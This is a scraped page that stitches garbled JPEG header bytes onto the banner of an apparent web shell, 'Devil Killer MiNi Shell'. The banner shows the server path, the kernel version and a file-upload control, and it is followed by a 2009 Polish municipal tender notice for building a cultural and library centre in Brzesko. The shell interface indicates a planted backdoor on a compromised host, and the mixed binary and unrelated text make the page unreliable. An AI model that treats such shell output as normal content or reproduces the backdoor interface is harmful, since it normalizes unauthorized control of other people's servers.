JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42865-N-2009.html

<p class="kh_header"><b>Brzesko: Budowa Regionalnego Centrum Kulturalno Bibliotecznego w Brzesku</b><br>
<b>Numer ogłoszenia: 42865 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Regionalnego Centrum Kulturalno Bibliotecznego w Brzesku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

na wykonanie zadania: Budowa Regionalnego Centrum Kulturalno Bibliotecznego w Brzesku.
             Obiekt został zaprojektowany na działkach nr. 1469/5 i 1471, położonych w Brzesku, jako trzykondygnacyjny budynek o konstrukcji żelbetowej i murowanej.  Gmina Brzesko jest w posiadaniu prawomocnej decyzji -  Pozwolenie na budowę obiektu będącego przedmiotem zamówienia.  Z uwagi na niekorzystne właściwości nośne gruntu na którym ma być  posadowiony obiekt, projektant przewidział wykonanie fundamentów na palach oraz wykonanie płyty fundamentowej ( należy zwrócić szczególną uwagę na sposób posadowienia budynku). Przed rozpoczęciem robót ziemnych należy przełożyć kolidujący gazociąg ( zgodnie z projektem) pod nadzorem tut. zakładu gazowniczego. 

W zakres robót objętych zamówieniem wchodzi:  wykonanie kompletnego budynku Regionalnego Centrum Kulturalno Bibliotecznego w Brzesku, wraz z przyłączami ( za wyjątkiem przyłącza elektrycznego), to jest:

1). Budowa budynku Regionalnego Centrum Kulturalno Bibliotecznego,
.	stan surowy budynku,
.	roboty wykończeniowe,
2).  Wykonanie przyłączy  i  instalacji, w tym:
.	instalacja wodociągowa z przyłączeniem jej do istniejącej sieci wodociągowej,
.	wewnętrzna kanalizacja sanitarna z przyłączeniem jej do istniejącej sieci kanalizacyjnej,
.	wykonanie odwodnienia z budynku i placu z przyłączem do istniejącej sieci deszczowej,
.	wykonanie wewnętrznej instalacji elektrycznej, odgromowej i oświetlenia zewnętrznego (wykonanie przyłącza będzie wykonane przez Zakład Energetyczny w ramach odrębnej umowy),
.	wykonanie instalacji gazowej i przyłącza gazowego  
.	przełożenie uzbrojenia kolidującego z budowanym obiektem, 
.	wykonanie instalacji C.O,
.	wykonanie, wyposażenie i uruchomienie kotłowni gazowej 
.	wykonanie instalacji klimatyzacyjnej i wentylacyjnej.
.	Wykonanie instalacji teletechnicznej, komputerowej i nagłaśniającej ( w zakres zamówienia nie wchodzi: sprzęt komputerowy oprogramowanie i nagłośnienie - urządzenia te zostaną zakupione przez zamawiającego we własnym zakresie),
.	Wyposażenie pomieszczeń w meble ( szafy, regały, biurka, fotele, krzesła lady itp.) zgodnie ze specyfikacją która określa rodzaj i ilość mebli.

3). Wykonanie dróg dojazdowych, parkingów, chodników i zagospodarowanie działki.
4). Sporządzenie instrukcji p.poż oraz oznakowanie dróg ewakuacyjnych w obiekcie i wyposażenie obiektu w sprzęt gaśniczy - zgodnie z wymogami p.poż. i sporządzoną instrukcją. 
5). Wykonanie innych robót towarzyszących koniecznych do wykonania w związku z realizacją zadania  (wytyczenie  geodezyjne obiektu i przyłączy, urządzenie placu budowy, zabezpieczenie, oświetlenie i oznakowanie placu budowy, dojazdy prowizoryczne, inwentaryzacje geodezyjne  itp.).

Szczegółowy zakres robót objętych zamówieniem, określa:
-	dokumentacja techniczna ( projekty branżowe i obmiary robót),
-	specyfikacja techniczna wykonania i odbioru robót budowlanych,
-	specyfikacja wyposażenia obiektu.
Które stanowią integralną część niniejszego opisu przedmiotu zamówienia.
           
Roboty muszą być wykonane z materiałów które zapewni wykonawca w cenie ofertowej, a jakość materiałów musi odpowiadać wymogom zawartym w dokumentacji technicznej i specyfikacji wykonania i odbioru robót budowlanych, oraz spełniać wymagane prawem polskim (i unijnym) normy dla tego typu obiektów. 
Na  każde  żądanie  Zamawiającego  Wykonawca dostarczy atesty na materiały wbudowane, a w przypadku potrzeby materiały te zostaną poddane kontroli  w miejscu produkcji, na placu budowy, lub w określonym przez Zamawiającego miejscu - na koszt Wykonawcy.

Jeżeli w projekcie kosztorysach czy obmiarach, projektant użył nazwy producenta materiału, urządzeń czy wyposażenia, należy to traktować jedynie jako informację podaną przykładowo. Do wykonania zadania wykonawca ma prawo użyć materiały i wyroby dowolnego producenta pod warunkiem że ich parametry nie będą gorsze pod względem jakości od tych które są podane w dokumentacji projektowo-kosztorysowej. 
Cena ofertowa powinna być skalkulowane przez wykonawcę na podstawie analizy pełnej dokumentacji projektowej udostępnianej zainteresowanym zamówieniem wykonawcom.
 Wykonawcy mogą umawiać się telefonicznie lub pisemnie z osobą upoważnioną przez zamawiającego do kontaktów z wykonawcami co do terminów w sprawie oględzin terenu budowy ( nie jest to wymóg obligatoryjny). 
               Zadanie musi być wykonane zgodnie ze sztuką budowlaną tak aby obiekt mógł prawidłowo funkcjonować, zgodnie z jego przeznaczeniem. Ponieważ zadanie może być realizowane w różny sposób (przy zastosowaniu różnego typu rusztowań czy sprzętu) dlatego wykonawca musi oszacować wszelkie nakłady dotyczące robocizny, sprzętu i materiałów  których będzie musiał użyć do wykonania zadania. W trakcie realizacji obiektu ( za zgodą stron)  mogą być wprowadzone niewielkie zmiany dla poprawienia estetyki i funkcji budynku - np. zmiana kolorystyki, zastosowanie lepszych materiałów wykończeniowych ( jeżeli takie pojawią się na rynku i będą się mieścić w cenie materiałów przyjętych w projekcie). 

Integralną część niniejszego opisu przedmiotu zamówienia stanowią :

I. przedmiary na:

1.	roboty konstrukcyjno-budowlane,
2.	instalacje wod-kan,
3.	instalacje C.O,
4.	technologię kotłowni,
5.	instalacje elektryczne.
6.	instalacje teletechniczne
7.	wentylację mechaniczną i klimatyzację 
8.	przyłącza
9.	place i drogi
10.	przełożenie gazociągu

II . projekty techniczne:

1.	Architektura
2.	Konstrukcje
3.	Instalacje elektryczne
4.	Instalacje sanitarne (wraz z innymi instalacjami, przyłączami i kotłownią)
5.	drogi.


III. Specyfikacje techniczne wykonania i odbioru robót budowlanych.
1.	Specyfikacje na roboty budowlane ( dla wszystkich branż)
2.	Specyfikacja na wyposażenie budynku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9, 45.21.23.30-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent zapewni jako część swojej oferty wadium w wysokości; 
170 000,00 PLN ( słownie : sto siedemdziesiąt tysięcy złotych, 00/100 PLN ) zgodnie z art. 45 upzp oraz ust. 8 SIWZ<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału w postępowaniu jest:

1). Złożenie pisemnej oferty  z podaniem ceny ofertowej netto i brutto za wykonanie zadania, oraz podaniem terminu wykonania zadania w miesiącach.  Cena ofertowa będzie traktowana jako cena ryczałtowa za wykonanie całego zakresu robót.
Oferta winna być złożona na formularzu stanowiącym załącznik do nin. specyfikacji, w której jednocześnie wykonawca akceptuje ustalony okres związania ofertą oraz warunki zawarte w SIWZ. Złożenie oferty na innym formularzu nie będzie stanowiło przesłanki do odrzucenia oferty ale tylko wtedy jeżeli jego treść  będzie całkowicie pokrywać się z treścią formularza wzorcowego (załączonego przez zamawiającego do materiałów przetargowych - załącznik nr 7 do nin. SIWZ). 
Do oferty należy dołączyć kosztorysy na zakres robót objętych przetargiem (opracowany wg. wskazań jak w  ust. 12 nin. specyfikacji), oraz harmonogram odzwierciedlający sukcesywną realizację zadania - tak pod względem rzeczowym, jak i finansowym - wg zał nr 11 do nin. SIWZ. 
2). Wykazanie, że wykonawca posiada uprawnienia do kierowania robotami w zakresie robót konstrukcyjno-budowlanych, sieci i instalacji sanitarnych, instalacji elektrycznych, sieci i instalacji gazowych i robót drogowych lub dysponuje osobami z takimi uprawnieniami. 
3). Wykazanie, że wykonawca zatrudnia lub dysponuje co najmniej 50 osobową kadrą pracowniczą zdolną do wykonania zadania. 
4). Wykazanie, że wykonawca posiada lub dysponuje podstawowym sprzętem budowlanym do wykonania zadania. Zamawiający wymaga aby wykonawca dysponował co najmniej wymienionym poniżej sprzętem:
.	wyciąg budowlany o udźwigu co najmniej 500 kg, - 1 szt, 
.	koparka kołowa lub gąsienicowa o poj. łyżki co najmniej 0,5m3  - 1 szt.
.	dźwig co najmniej o udźwigu 5 t, wysokości 30mb, zasięgu 20mb. - 1 szt,
.	betoniarka o poj. co najmniej 0.25m3 - 1 szt,
.	agregat tynkarski - 1 szt,
.	spawarka  co najmniej 400 A - 1 szt,
.	rusztowanie ( z blatami) co najmniej 500 m2 .
.	samochód dostawcze o ładowności co najmniej 8 t. - 1 szt,
.	giętarka do stali - 1 szt.

5). Udokumentowanie, że wykonawca zarejestrował i prowadzi działalność gospodarczą  w zakresie wykonywania robót budowlanych, działalność jest ubezpieczona od OC oraz, że nie figuruje w Krajowym Rejestrze Karnym za przestępstwa o których mowa w art. 24 ust 1 p. 4-9 ustawy prawo zamówień publicznych. 

6). Wykazanie, że Wykonawca wykonał przynajmniej jedno zadanie podobne w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. Jako zadanie podobne uważać się będzie wykonanie  kubaturowego obiektu użyteczności publicznej, obiektu sportowego, biurowego  lub budynku mieszkalnego o kubaturze  nie mniejszej niż 12 000 m3  i wartości nie  niższej  niż  8 000 000,0 zł. - brutto (tzn. robót konstrukcyjnych i innych branż umożliwiających funkcjonowanie  obiektu zgodnie z jego przeznaczeniem).
Wykonanie podobnego zadania powinno być udokumentowane referencjami wystawionymi przez inwestora potwierdzającymi solidne wykonanie lub innym dokumentem (np. bezusterkowym protokołem odbioru robót). Z treści dokumentu musi wynikać, że wykonane roboty spełniają wymogi kwalifikujące je do (robót podobnych). 
W przypadku nie udokumentowania wykonania przynajmniej jednego zadania podobnego lub złożenia niepełnych czy niewiarygodnych dokumentów które winny potwierdzać wykonanie zadania podobnego, wykonawca zostanie wykluczony z ubiegania się o zamówienie a oferta odrzucona. 
7). Złożenie wszystkich załączników i oświadczeń wymaganych w ust. 6 niniejszej specyfikacji, oraz sporządzenie oferty wg. wskazań zawartych ust.10 i 11  SIWZ.
8). Spełnienie warunków wymaganych  w art. 22, ust. 1 ustawy (prawo zamówień publicznych) i brak przesłanek do wykluczenia na podstawie art. 24 ustawy p.z.p.
9). Wniesienie w wyznaczonym terminie wadium w wysokości 170 000,00 zł. 

Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność-przez osoby uprawnione lub na podstawie pełnomocnictwa udzielonego przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk ZP-14 - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada wymagane uprawnienia, do wykonywania zadania oraz nie podlega wykluczeniu na podstawie art.24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, zamawiający żąda dołączenia do oferty następujących dokumentów.


1)	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

2)	aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

3)	 aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt  4-8 ustawy, wystawionej nie wcześniej niź 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert;

4)	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału 
w postępowaniu o udzielenie zamówienia albo składania ofert:


2. Celem potwierdzenia,  że wykonawca posiada niezbędną wiedzę, oraz potencjał techniczny i kadrowy do wykonywania zadania zamawiający żąda dołączenia do oferty następujących dokumentów.


1). wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, kubatury, wykonanych branż budowlanych w ramach zrealizowanego obiektu,  daty  miejsca wykonania oraz  nazwy i adresu inwestora - wg zał. Nr 8 do SIWZ (zaleca się również podanie nr. Tel. Inwestora). Do wykazu należy dołączyć dokumenty potwierdzających, że roboty te zostały wykonane w sposób należyty (referencje, protokół odbioru robót itp.). 

2). wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi   
     dysponuje lub będzie dysponował wykonawca ( o których mowa w ust 5 p.4),


2a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa 
w p.pkt 2 wykonawca wskazał narzędzia i urządzenia innego podmiotu, którymi będzie dysponował  ( wg. zał. Nr 10 do SIWZ).

3). informacji na temat przeciętnej liczby zatrudnionych pracowników, w okresie 
ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, jeżeli przedmiotem zamówienia są roboty budowlane, 

4). wykazu osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności;

4a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w p.pkt. 4) wykonawca wskazał takie osoby ( osoby innych podmiotów),

5). stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia jako osoby kierujące robotami posiadają  uprawnienia budowlane do kierowania robotami ( co najmniej )  w zakresie robót konstrukcyjno-budowlanych, sieci i instalacji sanitarnych, instalacji elektrycznych, sieci i instalacji gazowych i robót drogowych (uprawnienia budowlane - w myśl przepisów ustawy: Prawo Budowlane). 

6). Aktualne zaświadczenia, że osoby o których mowa w p.pkt. 5) są zarejestrowane w Okręgowej izbie Inżynierów budownictwa.

3. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonywanie zadania, zamawiający żąda dołączenia do oferty następujących dokumentów.

1). informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, 
w których wykonawca posiada rachunek, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,  potwierdzającej,  że  Wykonawca posiada na koncie finansowym środki w wysokości nie mniejszej niż 500 000 zł. lub posiada zdolność kredytową  w tej wysokości,  

2). polisy, a w przypadku jej braku innego dokumentu potwierdzającego, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 pkt 2, 3 i 5 Rozporządzenia Prezesa Rady Ministrów  z dnia  19 maja 2006 r. ( DZ. U Nr.87 poz. 605  z późn. zm.):
1. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy prawo zamówień publicznych 
2. Dokumenty, o których mowa w pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w  pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 1 , zastępuje się je dokumentem zawierającym oświadczenie złożone  przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzib´ lub miejsce zamieszkania.
Przepis ust. 2 stosuje się odpowiednio.


W celu potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego, zamawiający może żądać w szczególności rzeczy i zaświadczeń, o których mowa w § 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. ( DZ. U Nr.87 poz. 605  z późn. zm.).

4. Wymagane oświadczenia:

1).  Oświadczenia w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ.
2).  Oświadczenia w trybie art. 24 ustawy Pzp - załącznik Nr 2 SIWZ.
3).  Oświadczenia uzupełniającego w zależności od statusu prawnego Oferenta w trybie art. 24 ust. 1 pkt 4-9 ustawy Pzp - załącznik Nr 3 SIWZ.
4). oświadczenie wykonawców wspólnie ubiegających się o zamówienie w którym      
      wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o   
      udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w  sprawie zamówienia publicznego. (wymóg ten dotyczy jedynie wykonawców którzy  składają wspólną ofertę).
5). Oświadczenie o podwykonawcach -  załącznik nr 9  SIWZ.   Składający ofertę podpisuje oświadczenie, że całe zadanie wykona siłami własnymi, lub wypełnia tabele i podpisuje oświadczenie, że ma zamiar podzlecić część zamówienia podwykonawcom -  z podaniem kto będzie podwykonawcą, jaki rodzaj robót  będzie podzlecony oraz za jaką kwotę.
6). Oświadczenie o akceptacji projektu umowy na takich warunkach jak we wzorze umowy stanowiącym załącznik NR 6 SIWZ  - załącznik Nr 4 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 32-800 Brzesko ul. Głowackiego 51. p.109,tel.0-14 68 63 100 wew.121(g.od 7:30 do 15:30 ),e-mail;sa.inwest@brzesko.pl-cena SIWZ wer.elektr.5 zł,wer.papier. 2450zł.oraz koszty przesyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: Urząd Miejski w Brzesku 32-800 Brzesko ul. Głowackiego 51. p.101 - Sekretariat Burmistrza Brzeska.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 -Oś priorytetowa 3. Turystykai przemysł kulturowy.
Na podstawie art. 144 ust 1 zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści ofert, na podstawie której dokonano wyboru wykonawcy oraz określa poniżej warunki takiej zmiany;

1. Obniżenie wartości umowy w przypadku odstąpienia od wykonania części robót budowlanych, które obejmowało zamówienie.

Warunkami tych zmian są: 
-	wskazanie robót, które ze względów ekonomicznych lub  technicznych nie mogą lub nie muszą być wykonane, 
-	zgoda obu stron umowy ,
-	zmiany te muszą być korzystne dla zamawiającego,

2. Obniżenie wartości umowy w przypadku robót budowlanych  zamiennych wartość umowy zostanie obniżona o różnice wynikające z  właściwych wartości wskazanych z formularzu ofertowym. 

Warunkami tych zmian są: 
-	wskazanie robót, zamiennych,  które ze względów ekonomicznych lub  technicznych mogą być wykonane w innej technologii lub przy użyciu innych materiałów,
-	zgoda obu stron umowy ,
-	zmiany te muszą być korzystne dla zamawiającego,

